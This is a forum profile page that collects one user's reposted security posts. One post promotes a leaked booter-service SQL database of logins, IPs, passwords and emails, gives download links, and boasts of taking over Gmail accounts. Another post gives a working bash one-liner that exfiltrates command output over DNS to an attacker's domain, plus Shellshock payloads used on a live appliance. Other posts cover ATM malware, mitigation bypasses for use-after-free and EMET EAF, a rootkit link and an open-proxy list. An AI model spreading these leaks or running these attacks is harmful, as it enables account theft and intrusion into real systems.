-
Posts
18772 -
Joined
-
Last visited
-
Days Won
729
Everything posted by Nytro
-
Cititi bre, ca in lumea asta nu e doar XSS.
-
Lizardstresser.su Full SQL DB Leak Recently LizardSquad's(@LizardMafia) DDoS booter LizardStresser.su had they entire SQL DB leaked! They keep trying to suppress the leak with gay report-cannons and DMCA pulls lol However this leak is wayyyy too fucking juicy to let it not go viral... The SQL DB is filled with login ips,usernames,passwds,emails and even BTC addresses!!! *Many skids fell for they trick to turn off VPN/Proxy to use the booter so it recorded they real IPs* *Also many use same passwds for they login as the listed email the signup with... already got into 20+ gmails lol* All creds for the epic hack go to teh homie nachash(@loldoxbin) Screenshot: imgur: the simple image sharer [+] Torrent [+] https://kickass.so/lizardstresser-su-full-sql-db-leak-t10101482.html [+] Torrent Magnet [+] magnet:?xt=urn:btih:DD8AC598B6980F9A275BAF7B0046FF69DDE12AE0 [+] Download Mirrors [+] https://mega.co.nz/#!m0tgjC5D!edNG37Jna0hiC3N8tzUuAsOL8xKgXyimHTNR4F_BbRE lizards-full Sursa: [+] Lizardstresser.su Full SQL DB Leak [+] - Pastebin.com
-
Tyupkin ATM Malware Analysis Introduction Some time ago, Kaspersky discovered and reported a new type of malicious program called Tyupkin, which targets ATM machines by moving beyond targeting consumers with card skimmers that steal debit card numbers to directly getting cash from an ATM without the need for a counterfeit or stolen card. At the heart of the Tyupkin exploitation of ATMs is the simple fact that it requires physical access to an ATM. The attacker would need a bootable CD to install the malware in the ATM. Because of this, physical security elements should be seriously taken into consideration. According to Kaspersky, this malware was active on more than 50 ATMs in Eastern Europe, but from VirtualTotal submissions, we consider that this malware has spread to several other countries, including the US, India and China. Here are the basic steps of how this malware performs its attack: It is only active at specific times of the night on certain days of the week, between Sunday and Monday 1:00 to 5:00. There is a hidden window running the malware in the background. When the user enters the right key in the keypad, it displays the program interface, then it generates a key based on a random seed. Of course, the algorithm responsible for this operation is known only by the authors of the malware to prevent anyone from interacting with the ATM. When the correct key is entered, it leads to the process to take money off the net. WOSA/XFS Overview First and foremost, let me give you a brief overview of what’s related to banking technology. Historically, hardware vendors have taken a proprietary approach, with products and protocols designed purely for their own machines. This has promulgated the usual problems of closed systems: loss of hardware independence, inability to have a mixed vendor implementation, high cost of change, etc. Now, industry-wide standards are being introduced – a move which is creating an open environment and which will have wide-ranging ramifications for the self-service industry. Most prominent amongst these standards is WOSA, which has been developed by Microsoft, and is comprised of many of the main integrators and hardware vendors. They have taken Microsoft’s Windows Open Service Architecture and added Extensions for Financial Services (the XFS part) in order to meet the special requirements of financial applications for access to services and devices. The essence of WOSA is that allows the seamless integration of Windows applications with services and enterprise capabilities needed by users and developers. It is a family of interfaces which shield users and developers from system complexities and which offer, for instance, standard database access (ODBC) and standard access to messaging services and communication support, including SNA, RPC and Sockets. Each of the elements of WOSA includes a set of Application Program Interfaces (API) and Service Provider Interfaces (SPIs) with associated supporting software. The WOSA XFS incorporates the definition of a further API and corresponding set of SPIs. The specification defines a standard set of interfaces such that, for example, an application that uses the API set to communication with a particular service provider can work, without need for enhancement, with another vendor’s service provider as long as that vendor is WOSA XFS compliant. Although the WOSA XFS defines a general architecture for access to service providers from Windows based applications, the initial focus has been on providing access to peripheral devices that are unique to financial institutions, such as ATMs. Since these devices are often complex, difficult to manage, and proprietary, the development of a standardized interface to them offers financial institutions immediate gains in productivity and flexibility. WOSA XFS changed its name to simply XFS when the standard was adopted by the international CEN/ISSS standards body. However, it is most commonly called CEN/XFS by the industry participants. As we have seen previously, Payment Systems and Electronic Funds Transfer is a black art due to everything being proprietary. You need to work as an employee of a big vendor (like NCR, Diebold, etc.) or at a financial institution or a bank in order to understand the end to end picture. You’ll not find enough information by just looking for freely available documents and code on the Internet – just because these standards are not open at all! Coming back to Tyupkin, this malware uses the WOSA/XFS or CEN/XFS which different hardware vendors comply with. As far as we are concerned, they get their hands on some manual references that contain detailed information on how to interact with the ATM. We have found XFS specification papers released by CEN which we will use along this analysis to understand the XFS architecture. We have seen also some leaks on Baidu search engine published by F-Secure, but we are not sure that it was the ones used by cybercriminals. WOSA/XFS Architecture The architecture of the Extensions for Financial Services (XFS) system is shown below: The applications communicate with service providers via the Extensions for Financial Services Manager using the API set. The XFS Manager provides overall management of the XFS subsystem. The XFS Manager is responsible for mapping the API (WFS…) functions to SPI (WFP…) functions, and calling the appropriate vendor-specific service providers. Note that the calls are always to a local service provider. Each XFS service for each vendor is accessed via a service-specific module called a service provider. For example, vendor A’s journal printer is accessed via vendor A’s journal printer service provider, and vendor B’s receipt printer is accessed via vendor B’s receipt printer service provider. Technical Analysis SHA256: b670fe2d803705f811b5a0c9e69ccfec3a6c3a31cfd42a30d9e8902af7b9ed80 VirusTotal report here, Cuckoo Sandbox report here. We are going to use these tools to perform the analysis: DotNet Reflector / RDG Packer Detector / PEBear This sample has been compiled with C# Dot NET language: By looking at the imports/exports: As you can see, MSXFS.DLL is our dll from Microsoft which contains the function calls to the API and SPI. After the sample run, it sleeps for 10 minutes to evade anti-malware tools: Then, it will call InitializeComponent () which is responsible for setting the right names for labels, fonts, and colors for the different objects of the Form including the main window. Afterwards, it calls SHGetFolderPath two times to get the System directory as well as the startup directory. Persistence to reboot in the registry key: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunAptraDebug Make a copy of itself in C:WINDOWSsystem32ulssm.exe, I am not totally sure about this, strings are obfuscated and I could not decrypt them manually, I tried de4net but it failed. Next, it calls prepareXFSManagerAndOpenServiceProvider. Basically, before an application is allowed to utilize any of the services managed by the XFS subsystem, it must first identify itself to the subsystem. This is accomplished using the WFSStartUp function. An application is only required to perform this function once, regardless of the number of XFS services it utilizes, so this function would typically be called during application initialization. Similarly, the complementary function, WFSCleanUp, is typically called during application shutdown. If an application exits or is shut down without issuing the WFSCleanUp function, the XFS Manager does the cleanup automatically, including the closing of any sessions with service providers the application has left open. Once a connection between an application and the XFS Manager has successfully been negotiated via WFSStartUp, the application establishes a virtual session with a service provider by issuing a WFSOpen request. Opens are directed towards “logical services” as defined in the XFS configuration. A service handle (hService) is assigned to the session, and is used in all the calls to the service in the lifetime of the session. Finally, when an application no longer requires the use of a particular service, it issues a WFSClose. After successfully preparing the XFS service manager, the malware start two threads, and if it fails it just deletes the bin silently and exits. TimeInterval thread will determine whether the current system time is Sunday or Monday, between 1:00 to 5:00 AM. If the condition is met, it will be marked as a PIN_PAD_ACTIVE_TIME. The second thread MainLoop checks for this Boolean field. If true, if the condition is satisfied, it calls waitForMasterKey, which is self-explained. Inside this function, it calls WFSExecute with WFS_CMD_PIN_GET_DATA attribute (0×198). WFSExecute sends a service-specific command to a service provider, here is the prototype that corresponds to this API: HRESULT WFSExecute (hService, dwCommand, lpCmdData, dwTimeOut, lppResult) hService is the handle to the service as returned by WFSOpen, and WFS_CMD_PIN_GET_DATA is the command which is used to return keystrokes entered by the user. It will automatically set the PIN pad to echo characters on the display if there is a display. For each keystroke, an execute notification event is sent in order to allow an application to perform the appropriate display action. The third argument is interesting, it is a pointer to a command data structure to be passed to the service provider, and this data structure is defined as follows: usMaxLen Specifies the maximum number of digits which can be returned to the application in the output parameter, which is in our case is equal to 10. If bAutoEnd is set to true, the service provider terminates the command when the maximum number of digits is entered. Otherwise, as our case, the input is terminated by the user using one of the termination keys. When usMaxLen is reached, the service provider will disable all numeric keys. The third and fourth parameters are not important for us. uTerminateFDKs Specifies those FDKs which must terminate the execution of the command. In our case, this value is equal to 0×400, which is the ENTER key: #define WFS_PIN_FK_ENTER (0×00000400) Then, it tests whether WFSExecute returned the right value, which is 0, otherwise when there is an error, it calls again the prepareXFSManagerAndOpenServiceProvider and WFSExecute API. #define WFS_SUCCESS (0) #define WFS_ERR_NOT_STARTED (-39) Finally, it calls the function scenario (), and depending on which key sequence has been taped on the PINP AD, Tyupkin does the following: MKEY_CLOSE_AND_ERASE_APP: the corresponding key sequence (333333) Close and delete the program. MKEY_HIDE_APP: the corresponding key sequence (111111) Hide the application’s main screen. MKEY_EXTEND_TIME: the corresponding key sequence (555555) Modify the time period of the activation of the malware, and display time was extended, then sleep 2 seconds and return -1. MKEY_SHOW_APP: the corresponding key sequence (22222) Display the main screen of the application, then it calls PrintCode () which generates randomly 8 digits and wait for the equivalent session key to be entered according to some algorithm. When the right code is entered, DISPENSE_SESSIOM_ACTIVE is equal to True. After the user enters the cassette number and presses enter, it calls getDecimalNumberFromPINFKDigit to convert the number entered to an integer, then it verifies if it is bigger than 1 and smaller than the total number of cassettes and calls executeDispense, which in turn calls WFSExecute with WFS_CMD_CDM_DISPENSE, then calls getCashUnitInfo/getCashUnitInfo which calls WFSGetInfo (retrieves information from the specified service provider) to get information related to each cassette and how much income there is on it. Conclusion and IOC As far as I am concerned, we are going to see more cases related to ATM malwares, because this is where the money is. Targeting financial institutions directly is better for cybercriminals than doing skimming or running RAM scrappers or doing web injects and ATS stuff. Ploutus malware has been shown to be before, and Tyupkin is now a concrete weakness in the ATM infrastructure. Also the fact that many ATMs run unsupported OS like Windows XP and the absence of security solutions is another problem that needs to be addressed urgently. My recommendation for the banks is to review the physical security of their ATMs and their employers (insiders?). Indicators of compromise: Check the ATM equipment for the following files: C: Documents and Settings All Users Start Menu Programs Startup AptraDebug.lnk C: WINDOWS system32 ulssm.exe Check the following registry key: HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Run AptraDebug References http://securelist.com/blog/research/66988/tyupkin-manipulating-atm-machines-with-malware/ http://sourceforge.net/projects/openxfs/ http://www.cen.eu/work/areas/ict/ebusiness/pages/ws-xfs.aspx By Shaman Vilen|January 19th, 2015 Sursa: http://resources.infosecinstitute.com/tyupkin-atm-malware-analysis/
-
Use-after-Free: New Protections, and how to Defeat them January 17, 2015 / Jared DeMott The Problem Memory corruption has plagued computers for decades, and these bugs can often be transformed into working cyber-attacks. Memory corruption is a situation where an attacker (malicious user of an application or network protocol) is able to send some data that is improperly processed by the native computer code. That can lead to important control structure changes that allow the attacker unexpected influence over the path a program will travel. High-level protections, such as anti-virus (AV), have done little to stop the tide. That is because AV is poor at reacting to threats if they do not exist in their list of known attacks. Recent low-level operating system (OS) protections have helped. Non-executable memory and code module randomization help prevent attackers from leveraging memory corruption bugs, by stopping injected code from successfully executing. Yet a new memory corruption exploit variant called return-oriented programming (ROP) has survived these defenses. ROP operates by leveraging existing code in memory to undo non-executable memory protections. New medium-level defenses, such as Microsoft’s anti-ROP add-on called EMET, have helped some. But a particularly troublesome bug known as Use-after-Free (UaF) has been applied in conjunction with other techniques to bypass EMET (See Prior Blog HERE). UaFs have been the basis of many current cyber attacks including Operation SnowMan (CVE-2014-0322) and Operation Clandestine Fox (CVE-2014-1776). Thus, it is clear that further low-level mitigations are required. The Solution To address the problem of UaF attacks, browser vendors have implemented new protections within the browser process. A UaF happens when (1) a low-level data structure (called an object in C++) is released prematurely. (2) An attacker knows about this release and quickly fills that space with data they control. (3) A dangling reference to the original object, which another part of the program assumes is still valid, is used. But of course, an attacker unwittingly changed the objects data. The intruder can now leverage the influence afforded by the corrupted memory state to hijack the compromised program. Microsoft choose to tackle this serious UaF problem with two new protections. These protections work together to stop attackers from being able to allocation new data in the spot where a dangling reference points. They call the new protections Heap Isolation and Delayed Free. The premise of these protections is simple. Heap Isolation creates a new heap. A heap is a place that a program uses to create/free internal data as needed throughout execution. This new isolated heap houses many internal Internet Explorer objects. While objects likely to be under the influence of attacks (like strings created via Java Script) will still be allocated on the typical default heap. Thus, if a UaF condition appears, the attacker should not be able to replace the memory of the dangling pointer with malicious data. We could liken this situation to forcing naughty school kids to use a separate playground from the trusted kids. But who is naughty and who is good? So also an obvious weakness with this approach is that with the many different objects used in a complex program like a browser, it is difficult for developers to perfectly separate the two groups of objects. So Microsoft also created a second cleaver protection. Delayed free operates by not releasing an objects memory right away. In our analogy, if we assume the goal of the naughty kid is to steal the place in line from a good kid that unexpected stepped out of line, we can think of this protection as the playground teacher watching that place in line for a while, before the slot is finally opened. Even though the program has asked the allocator to free a chunk of memory, the object is not freed, but is instead put on a list to be freed later, when the playground looks safer. That way even if an attacker knows of an object type on both heaps that could be used to replace the memory backing a dangling reference, they cannot since the memory has not actually been freed yet. The memory will not be truly freed until the following conditions are meet: there are no references to the object on the stack and there are at least 100,000 bytes waiting to be freed, or the per-thread call stack unwinds fully to its original starting point. Evaluation Though the new protections are definitely helpful, and I even recommend applying them to other applications, no native mitigation is enough. If we look back at the history of memory corruption, we see that every time vendors put forth a new OS security measure, it worked in slowing attackers for a season, but before long each mitigation was bypassed by some clever new attack. In my research, I show that one such bypass against these new protections involves using what I call a “long lived” dangling pointer. In my naughty child analogy, we can think of this as the sneaky and patient child that can go to either playground, and will wait for just the right moment before slipping ahead in line. In more technical terms, if an attacker can locate a UaF bug that involves code that maintains a heap reference to a dangling pointer, the conditions to actually free the object under the deferred free protection can be met (no stack references or call chain eventually unwinds). And finding useful objects in either playground to replace the original turns out not to be that difficult either. I wrote a python script to search the core Internet Explorer code module (called MSHTML.dll). The script finds all the different objects, their sizes, and notes rather it is allocated to the default or isolated heap. This information can be used to help locate useful objects to attack either heap. And with a memory garbage collection process known as coalescing the replacement object does not even have to be the same size as the original object. This is useful for changing critical data (like the vtable pointer) at the proper offset in what was the original object. The python code is HERE. For complete details on this research, please see the slides from my January 17th ShmooCon talk HERE. Sursa: Use-after-Free: New Protections, and how to Defeat them | Bromium Labs
-
Bash data exfiltration through DNS (using bash builtin functions) After gaining ‘blind’ command execution access to a compromised Linux host, data exfiltration can be difficult when the system is protected by a firewall. Sometimes these firewalls prevent the compromised host to establish connections to the internet. In these cases, data exfiltration through the DNS-protocol can be useful. In a lot of cases DNS-queries are not blocked by a firewall. I’ve had a real life situation like this, which i will describe later on. There are several oneliners on the internet available to exfiltrate command output through DNS. However, i noticed that these are using Linux applications (xxd, od, hexdump, etc), which are not always present on a minimalistic target system. I decided to create a oneliner, which is only using Bash builtin functionalities. The oneliner can be used whenever command execution is possible and Bash is installed on the compromised system. I’ve created the following bash command line which can be used on the attacked system to execute commands and send the results through DNS: LINE=`id`; domain="forsec.nl";while read -r -n 1 char;do var+=$(printf "%X" \'$char\');done<<<$LINE;b=0;e=60;l=${#var};while [ $b -lt $l ];do >& /dev/udp/$RANDOM.$b."${var:$b:$e}".$domain/53 0>&1;let b=b+60;done;>& /dev/udp/$RANDOM.theend.$domain/53 0>&1;unset var;unset var2 In order to use it, first modify the name servers of your domain, point them to the ip-address of the attacker machine. Also two values in the above oneliner need to be changed. The variable “LINE” needs to contain the command to execute, for example “ls -l /”. Also the variable “domain” needs to be modified, replace it with the domain which is pointed to your attacker machine. On the attacker machine, the following server side ruby script can be started: dns.rb The script will retrieve the output of the executed command. The following screenshot shows the command executed on a targeted system: This screenshot shows the retrieved data by the attacker, using the dns.rb script: There might be improvements possible to the oneliner and script to make it more efficient. Or there might be some cases where the oneliner doesn’t work. Do not hesitate to comment on this blog if you have an improvement. Real life scenario I stumbled on a Dell SonicWALL Secure Remote Access (SRA) appliance which was vulnerable to Shellshock. I discovered this by sending the following user-agent, which returned a 200 HTTP response. User-agent: () { :; }; /bin/ls When sending a user-agent with a non-existing binary, it returned a 500 HTTP response, which indicates something went wrong (it cannot execute the defined binary): User-agent () { :;}; /bin/fake I was able to execute commands using the Shellshock vulnerability (confirmed by running /bin/sleep 60), however it was not responding with the command output on commands like ‘ls’. I discovered that all outgoing connections to the internet were blocked by the machine, only the DNS protocol was allowed, by resolving a hostname using the telnet executable. The appliance did not have any executables like xxd, hexdump etc. Therefor i decided to create the above line, which is not depending on these utilities, so can be used on any system containing Bash. Dell is already aware of the Shellshock vulnerability in the older firmware versions of SRA. More details on how to patch the issue can be found at: https://support.software.dell.com/product-notification/133206?productName=SonicWALL%20SRA%20Series Sursa: https://forsec.nl/2015/01/bash-data-exfiltration-through-dns-using-bash-builtin-functions/
-
The PHP 7 Revolution: Return Types and Removed Artifacts Bruno Skvorc Published January 16, 2015 With the planned date for PHP 7’s release rapidly approaching, the internals group is hard at work trying to fix our beloved language as much as possible by both removing artifacts and adding some long desired features. There are many RFCs we could study and discuss, but in this post, I’d like to focus on three that grabbed my attention. PHP 5.7 vs PHP 7 As I mentioned in the last newsletter, 5.7 has been downvoted in favor of moving directly to PHP 7. This means there will be no new version between 5.6 and 7 – even if the new version was only to serve as a warning light to those still stuck on outdated code. Originally, 5.7 was not supposed to have new features, but was supposed to throw out notices and warnings of deprecation about code that’s about to change in v7. It would also warn about some keywords that are to be reserved in PHP 7, so that people can bring their code up to speed with a sort of “automatic” compatibility checker in the form of an entire PHP version. The thing is, however, as I argue in the newsletter, that most people technologically competent enough to follow PHP in its upgrade path by keeping up with the most recent version aren’t generally the type of people to actually be using code that might break in PHP 7. While this is a good discussion to have, what’s done is done and the voting is over. What do you think about this? Return Types With a vast majority voting “yes”, PHP is finally getting return types. The results of the vote are still fresh, but definite. Starting with PHP 7, we’ll finally be able to indicate proper return types on functions in the form of: [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]function foo(): array { return []; } [/TD] [/TR] [/TABLE] An improvement? Definitely! But perfect? Unfortunately, no: the return types can only be what we have for types right now, meaning no scalar values, no return types like string, int, bool, etc. This means that your methods and functions that return such values will still be unsigned. You can remedy this by returning instances of wrappers for such values, but that’s overkill in the vast majority of cases. no multiple return types. If your function returns either an array, or an Iterator object, there’s no way to indicate that via, for example, array|Iterator as we do in docblocks. Some people also complained about the type declaration being after the closing parenthesis of the argument list, rather than before the function name, but to me, this is nitpicking. Popular languages such as modern C++ use the “after” syntax, and like the RFC states, this preserves the possibility of searching for “function foo” without any necessary regex modifications. What’s more, this is in line with what HHVM uses, so it’s an added unintended compatibility bonus. Others complained about the “strictification” of PHP, but as one commenter states, you really find the value of this when you start coding against interfaces or inheriting other people’s code. Besides, as long as it’s optional and its existence does not in any way affect PHP’s general performance or stability, there’s no harm in it. Complaining about it is, to me, akin to complaining about OOP being added to PHP when procedural spaghetti worked so well for most cases back then. Languages evolve, and this is a step in the right direction. What do you think? Removing Artifacts The upcoming version proposes to remove PHP4 style constructors (yet to be voted on). You can read what this means in the RFC, it’s simple and would be futile to repeat it here – but what’s actually very interesting is the mental anguish such a move seems to be causing some people. For example, this. “Please do not break our language”, pleads Tony, who seems intent on using its broken features. The post is well written despite the obvious anger, but it makes me wonder – if you’ve kept such a codebase alive for so long, is there really a need to upgrade to PHP 7? And if there is a need to upgrade to PHP 7, is it not easier to simply hunt down the offending classes and fix their constructors? Surely this is something you can delegate to juniors, given enough unit tests in your code base to make sure it all goes well? And if you don’t have unit tests, if your app is a mess, do you really hope to benefit in any way from moving to PHP 7? Wouldn’t you be better off Modernizing your Application first? The sentence “This means that code which I wrote 10 years ago should still run today, and should still run 10 years from now.” is, to me, madness – you definitely and absolutely should not expect this of ANY language across major versions. To draw a parallel from the real world, you shouldn’t expect to be allowed to own slaves today just because a law from long ago said you could. Yes, the BC break came after a bloody revolution, but when most slaveowners repented or died, there was peace. Granted, Tony is right in that it would take effort to remove the feature, while it would take none to leave it in. But in the long run, it will take more collective effort to fix the problems these constructors sometimes cause, than to remove it right now. Understandably, BC breaks always upset some people, even if major versions are perfectly okay having BC breaks for the purpose of progress. But imagine the fervor when such people find out about this. Heck, imagine what would have happened if WordPress hadn’t stepped into 2001 last year and updated to mysqli instead of mysql – either no WP installation would work on PHP 7, or PHP 7 would keep an unsafe and long deprecated feature for the sole reason of keeping WP users happy. My advice to those fearing PHP 7 is – stop. If you don’t want to upgrade, don’t. If you could be on 5.3 or 5.2 for so long (looking at you, CodeIgniter), you can be on 5.6 for another decade – but let us have modern PHP. Leave progress up to those who are willing to accept it. What say you? Is this removal of artifacts nonsense or needed? Aside: Extension API Changes As an interesting sidenote, there are some changes in PHP 7 that might actually cause a bit of a delay with extension porting to version 7. The API for building PHP extensions is still under a revamping (read: cleaning) process and all is subject to change – nonetheless, this provocative tweet from Sara Golemon gathered quite a bit of attention. Damn. There are some serious surprises in the PHP7 Extension API changes. Not for nothin’, but it’s a good time to switch to HHVM. — SaraMG (@SaraMG) January 3, 2015 She basically says the changes in extension development from 5.6 to 7 will be so great, you might as well learn how to make HHVM extensions. She then proceeded to craft a lengthy series on that exact topic, explaining in depth and on examples how to create an HHVM extension. Do you develop extensions? Did you study the changes, or do you feel like it’s still too early to tell if they’ll have an effect? Conclusion As usual, there’s no shortage of drama in PHP land. Like all major revolutions throughout history, the PHP 7 revolution will also be spilling some blood before producing something awesome. PHP 7 is still a long way off, so even if you’re caught in the crossfire of musket shots, there’s ample time to get to cover. Unless you’ve been sleeping under tank tracks, then there’s little either side can do to help you. What do you think of these RFCs? How do you feel about PHP 7 in general? Is it heading in the direction you’d like it to head in? Let us know – we want to hear your thoughts! Sursa: http://www.sitepoint.com/php-7-revolution-return-types-removed-artifacts/
-
[h=1]FakeMBR[/h] TDL4 style rootkit to spoof read/write requests to master boot record Needs to be compile with NTDDK. See: Using Kernel Rootkits to Conceal Infected MBR | MalwareTech Link: https://github.com/MalwareTech/FakeMBR/
-
[h=3]Bypassing EMET's EAF Protection: A Slightly Alternative Approach[/h] So a lot of people as of late have been talking about EMET an in particular how to bypass many of its protections and features that it offers. I thought this was an interesting challenge given my background in exploit development, so I decided to devote my dissertation paper to finding how effective EMET 5.1 is at preventing people from exploiting programs using three different types of exploits. However a few days ago I hit an interesting problem and today I would like to share the solution I came up with in the hopes that it may be useful to others. My problem started when I needed to find a way to bypass EAF. For those of you who don't know, EAF protection is a protection offered as part of EMET's protection suite which prevents exploits from reading the Export Address Table (EAT) by blocking access to the EAT based on the origin of the code. Shellcode often needs to read the EAT in order to find out where various functions are in memory that it needs to call. Thus by filtering access to this table, shellcode, including metasploit shellcode, will be prevented from working, and EMET will simply detect an EAF bypass, will alert the user, and the program will be closed down. (Please see http://download.microsoft.com/download/A/A/8/AA853FAE-7608-462E-B166-45B0F065BA13/EMET%205.1%20User%20Guide.pdf for more details, in particular page 8) There is a way around this however. As discussed in Aaron Portnoy's "Bypassing All Of The Things" presentation (https://www.exodusintel.com/files/Aaron_Portnoy-Bypassing_All_Of_The_Things.pdf), one can simply obtain the addresses from the Import Address Table (IAT), as discussed in slide 77, rather than the EAT. The IAT contains a list of entires, each which is a pointer to the actual address of the corresponding function in virtual memory. To take a look at a executable's IAT, we can simply crack open a free version of IDA Pro and wait for IDA to finish examining the entire program. When its done, simply click on the tab labeled "Imports". You should end up seeing something like this: On the far left we can see the addresses for each of the IAT entries, followed by an ordinal number if there is one (so that the function can be called via its ordinal number rather than via its normal address. Google this if you don't know what I'm talking about, its a bit beyond this post), the name of the function, and the library from which it came from. So we have a way to get the actual address of the functions listed in the IAT, but what if the function you want does not exist as an entry within the IAT? Well, first you need to find an entry that exists in the same library as the function that you want to find the address of. Say I wanted to call ExitProcess, a function located in Kernel32.dll, and I know there is a function ReadFile which is also within Kernel32.dll. There is an entry to ReadFile within the IAT at 0054E1F4. Dereferencing this address will get me the address of ReadFile. Once I have the address of ReadFile I can then take advantage of another trick to get the real address of ExitProcess. You see, because ReadFile and ExitProcess are in the same DLL, they will both have the same base address. These are usually the first 2 bytes of a 32 bit address. Furthremore, all functions are loaded at static offsets from the base address, reguardless of how randomized the DLL might be by ASLR etc. Because of this, with knowledge of where ReadFile is in memory, I can simply add or subtract the offset from ReadFile to ExitProcess from the address of ReadFile to get the address of ExitProcess in memory. This offset will never change even after the machine reboots and the location of Kernel32.dll changes. However some of you might have noticed a slight problem with this. What if the program doesn't have an IAT entry to a function within the libary your desired function is in? Aka you want to call a function located in msvcrt.dll but there are no IAT entries that point to any functions within that library? Well this is exactly the situation I encountered in the field recently. I wanted to call the function memcpy using the IAT. memcpy is located in msvcrt.dll, however as you can see from the photo below, there is no IAT entry for memcpy: As a matter of fact, there isn't any entry in the IAT table for function that belongs to a library who's name even starts with "m". We're going to have to get a little creative here. If we look at the exe within Immunity Debugger, we notice that msvcrt.dll is actually loaded by the application itself. However because of rebasing, the address will change every time the system restarts: However there is a way to get this to work. What we can do is abuse some of the properties of LoadLibraryA to still dynamically get the location of memcpy. Conveniently, the IAT has an entry for this: Using this entry, we can simply dereference the memory address 0054E268 within our shellcode to get the address of LoadLibraryA. Once we have the address of LoadLibraryA, we can call it and pass a pointer to the string "msvcrt" on the stack (I have not shown how I dynamically created this on the stack, but its not too hard to do). Here is an example of this in an exploit I am presently working on (to give a more realistic example): As you can see, we are presently calling LoadLibraryA, by dereferencing the address in EDX. EDX contains 0054E268, or the IAT entry for LoadLibraryA. By deferencing and then calling this address I end up calling LoadLibraryA itself. On the stack you can also note that I have placed the address where the "msvcrt" string is located, namely 10027090, as the library that I wish to load. Lets see what happens after this call completes: As we can see, the base address of msvcrt.dll is placed into EAX once the call is done. This means that based off of one entry within the IAT table, we can figure out the address of any other function in memory. Furthermore, even if the corresponding DLL is not loaded within the current program, LoadLibraryA will load the libary for you into the current process and return the base address where that library was loaded into EAX. Therefore, reguardless of the load status of the DLL which contains the function you are after, this trick will still work. At this point, all we need to do is add to EAX the offset to the function we want to call within msvcrt.dll. These offsets are static, as mentioned before, so even after a reboot they will still remain the same, thus defeating the rebasing. Anyway, I hope you guys found that interesting and useful. Just a little something I found during my research into EMET. -tekwizz123 Posted by thetekwizz at 7:48 AM Sursa: http://tekwizz123.blogspot.ro/2015/01/bypassing-emets-eaf-protection-slightly.html
-
[h=1]20-01-15 | VIP Socks 5 Servers (119)[/h] 20-01-15 | VIP Socks 5 Servers (119) Checked & filtered premium servers 107.152.104.44:50599 108.3.140.254:34574 111.90.159.200:12512 113.253.25.39:46046 121.211.21.238:17089 122.108.91.35:40975 124.160.35.2:808 130.237.16.25:20794 151.226.117.117:41816 162.104.79.68:28733 166.143.222.6:60104 170.163.116.108:80 173.161.58.177:20868 173.59.49.26:46147 174.57.25.16:19070 176.9.7.153:8777 178.137.171.205:36166 178.158.210.100:50250 180.153.139.246:8888 184.155.143.249:33697 184.59.142.248:20395 188.190.80.213:47118 194.247.12.49:25575 195.14.0.93:8080 195.22.8.47:53863 198.27.67.24:53193 198.8.92.212:9375 199.201.126.163:443 199.201.126.67:443 205.144.214.26:17232 209.148.89.210:53721 209.236.80.171:48179 212.57.179.193:2214 213.239.206.203:51042 216.8.240.194:23576 23.255.237.44:22999 24.155.226.138:29917 24.2.214.169:44300 24.200.71.134:19371 27.32.209.53:38158 31.202.206.22:47242 37.57.86.47:29108 46.185.34.205:21512 46.4.108.124:45288 46.4.88.203:9050 5.9.137.39:60555 5.9.60.41:5477 5.9.60.41:6060 61.147.67.2:9124 61.147.67.2:9125 62.183.105.233:8000 64.121.142.139:52491 65.24.180.150:18902 65.78.79.120:16905 66.172.99.160:20951 66.196.209.90:60159 66.83.236.125:80 67.86.13.241:37688 69.129.48.50:52259 69.253.214.65:35407 69.76.173.69:34598 71.194.121.105:48454 71.92.50.83:48964 73.17.20.150:32344 73.173.57.254:28077 73.190.248.101:28492 73.20.166.119:27670 73.25.97.27:39387 73.47.65.108:19160 73.51.146.191:41485 74.5.62.229:47309 75.183.75.32:46868 76.185.226.122:9691 77.242.22.254:8741 77.70.6.128:6789 78.39.178.2:443 78.62.77.63:5201 79.134.54.178:11721 81.159.25.90:31578 81.163.228.183:44921 84.109.188.145:17114 84.42.42.178:58530 85.15.66.132:16027 85.25.144.236:19494 85.30.233.152:34213 86.102.208.45:11970 86.102.208.45:18835 86.159.192.12:20548 88.203.104.225:41236 89.120.251.59:12937 89.215.95.7:22064 92.239.159.135:25079 92.245.196.43:21385 93.170.155.185:10536 93.170.155.185:8276 94.13.18.65:44238 94.211.155.1:25211 95.211.231.197:42094 95.211.231.198:15189 95.211.231.198:30436 95.211.231.198:30858 95.211.231.201:26507 95.211.231.201:53585 95.211.231.201:57872 95.211.231.202:1074 95.211.231.202:32234 95.211.231.202:40116 95.211.231.202:4215 95.211.231.202:60800 95.211.231.203:11165 95.211.231.203:20115 95.211.231.203:51061 96.227.244.232:32001 96.234.216.16:34369 96.237.192.11:16577 97.76.156.160:39954 97.81.116.155:42056 98.166.166.7:53444 98.237.12.7:21230 Sursa: 20-01-15 | VIP Socks 5 Servers (119) - Pastebin.com
-
[h=1]Using External Tools With Metasploit - Metasploit Minute[/h] Metasploit Minute - the break down on breaking in. Join Mubix (aka Rob Fuller) every Monday here on Hak5. Thank you for supporting this ad free programming. Sponsored by Hak5 and the HakShop - Trust your Technolust – HakShop :: Subscribe and learn more at Metasploit Minute | Technolust since 2005 :: Follow Rob Fuller at Room362.com and Rob Fuller (@mubix) | Twitter
-
Muie @em . Ar trebui sa se ocupe dar e ocupat sa castige 100 de milioane pe luna si sa nu faca nimic pentru comunitate.
-
How to install Android 5.0.1 Lollipop on Samsung Galaxy S4
Nytro replied to Nytro's topic in Mobile security
E Cyanogen modificat. Ultima versiune ar trebui sa contina ultimele patch-uri de la Cyanogen. -
[h=1]Interven?ie CCR pentru sus?inerea neconstitu?ionalit??ii legii securit??ii cibernetice[/h] Interven?ie CCR pentru sus?inerea neconstitu?ionalit??ii legii securit??ii cibernetice | Date personale si viata privata
-
[h=1]SRI: Accesul la date cu caracter privat, posibil exclusiv în baza unei autoriza?ii de la judec?tor[/h] SRI: Accesul la date cu caracter privat, posibil exclusiv în baza unei autoriza?ii de la judec?tor - Mediafax
-
